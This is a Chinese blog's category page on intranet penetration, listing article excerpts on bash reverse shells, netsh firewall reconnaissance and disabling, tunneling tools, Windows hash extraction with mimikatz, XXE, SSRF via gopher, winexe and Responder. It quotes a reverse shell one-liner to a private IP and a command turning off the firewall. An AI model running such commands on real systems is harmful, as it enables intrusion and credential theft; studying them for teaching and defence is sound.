内网渗透
文章平均质量分 84
XG小刚
这个作者很懒,什么都没留下…
展开
-
反弹shell--bash一句话解析
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途反弹shell解析bash反弹shell解析拆分语句了解一下交互式连接设备文件描述符合并输入输出大合并bash反弹shell解析最基础的反弹shell语句,这么久只会用,但不知道其中的奇妙之处真是妙蛙种子被踢出了米奇妙妙屋。。。bash -i >& /dev/tcp/192.168.1.1/8888 0>&1拆分语句了解一下交互式bash -i是打开一个.原创 2021-01-10 18:33:17 · 3286 阅读 · 3 评论 -
内网渗透-防火墙信息
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途防火墙信息防火墙信息查看配置操作防火墙设置出入站防火墙信息主要用来查看端口,开放端口通行查看配置netsh Firewall show state #查看防火墙状态netsh Firewall show config #查看防火墙配置netsh advfirewall Firewall #查看防火墙配置操作防火墙配置防火墙需要管理员权限netsh firewall s.原创 2020-12-06 16:49:53 · 641 阅读 · 0 评论 -
内网渗透-本机信息搜集
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途本机信息搜集本机信息搜集用户权限用户登录情况系统基本信息网络信息配置信息本地安装程序获取远程连接信息本机信息搜集搜集有用信息,主要是用来提权用户权限whoami /all #查看当前用户权限hostname #主机信息net user #用户列表net localgroup #查看所有组名,了解职能net localgroup "Administratorss" #查看指定组中的成.原创 2020-12-06 16:43:43 · 340 阅读 · 0 评论 -
内网渗透-内网穿透工具
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途WIN本地获取Hash内网穿透lcxnetshiptablesEarthworm端口复用reGeorg小结内网穿透想从外网渗透内网主机,但内网很多主机不直接连外网,所以要进行搭建通道(前提是已经控制了一台主机,通过这台主机渗透其他内网主机)win端口转发:lcx.exe netshlinux端口转发:portmap iptables多平台:Earthworm端口复用:reGeorg.原创 2020-12-06 12:57:47 · 1393 阅读 · 0 评论 -
内网渗透-获取WIN本地用户Hash
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途WIN本地获取Hashwin系统密码为什么要获取本地hash几种工具和获取方式注册表 + mimikatzProcdump + mimikatz直接mimikatz读取密码win系统密码Windows系统使用LM和NTLM两种方法对用户的密码进行加密处理,两种密码的加密方式在这有介绍Win本地hash概念但注意的是从win-server-2008开始默认禁止使用LM加密方式,统一使用NT.原创 2020-10-27 16:24:21 · 2680 阅读 · 0 评论 -
XXE漏洞-内网探测
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途XXE漏洞-内网探测XXE漏洞危害CTF案例XXE漏洞XXE :Xml External Entity 外部实体注入攻击是利用一种xml的语言进行的注入攻击XXE漏洞原理就不详解了,一搜一大把危害可以读取系统文件获取源代码进行SSRF进行Phar触发反序列化CTF案例本文主要是针对一个CTF题https://buuoj.cn/challenges#[NCTF2019]Tr.原创 2020-08-21 18:33:10 · 2311 阅读 · 1 评论 -
SSRF漏洞-Gopher协议扩展利用
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途Gopher协议扩展利用Gopher协议利用要点利用方式小案例ssrf利用redis写入webshellGopher协议Gopher在HTTP协议前是非常有名的信息查找系统,但是很老了,很少服务会用到它但是!在SSRF漏洞中,它大方光彩,让SSRF漏洞利用更加广泛利用此协议可以对ftp,memchahe,mysql,telnet,redis,等服务进行攻击,并可以构造发送GET,POST.原创 2020-08-20 10:21:04 · 2480 阅读 · 0 评论 -
内网渗透-SSRF漏洞
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途SSRF漏洞SSRF产生原因利用方式小案例1.请求内网资源2.端口扫描3.读取源文件4.Gopher://协议进行扩展攻击5.漏洞组合利用挖掘技巧1.传参方面2.web服务方面3.审计方面防御措施SSRFSSRF服务器端请求伪造,全英文Service_side Request Forgery 一般人也记不住主要利用漏洞来伪造成服务器端发起请求,比如绕过防火墙,进行内网探测,能够突破客户端获.原创 2020-08-19 15:35:21 · 1263 阅读 · 2 评论 -
内网渗透-Winexe使用
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途Winexe使用,执行远程命令Winexe获取主机密码访问系统提升为system权限Winexewinexe是linux运行的windows系统管理工具,在渗透测试中可以通过各种方式获取被攻击主机的用户密码,再使用winexe控制主机winexe是通过文件共享服务,在目标系统安装winexe服并运行,执行命令完成后,会自动删除对应的服务,防止被发现。获取主机密码内网渗透过程中有各种各样方.原创 2020-08-03 11:14:43 · 1915 阅读 · 0 评论 -
内网渗透-Responder捕获Win哈希
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途Responder捕获Win哈希实验环境Responder安装ResponderResponder参数获取NTLMv2哈希实验环境VM搭建的虚拟测试环境1.被攻击win7主机192.168.1.1302.kali 192.168.1.1313.win7配置netsh advfirewall set allprofiles state offwinrm quickconfigwinr.原创 2020-08-03 10:23:58 · 3135 阅读 · 0 评论 -
Win本地hash概念
转载https://www.secpulse.com/archives/65256.htmlWindows系统使用两种方法对用户的密码进行哈希处理它们分别是LAN Manager(LM)哈希和NT LAN Manager(NTLM)哈希。所谓哈希(hash),就是使用一种加密函数进行计算后的结果。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串。现在已经有了更新的NTLMv2以及Kerberos验证体系。Windows加密过的密码口令,我们称之为has.转载 2020-08-03 12:17:33 · 734 阅读 · 0 评论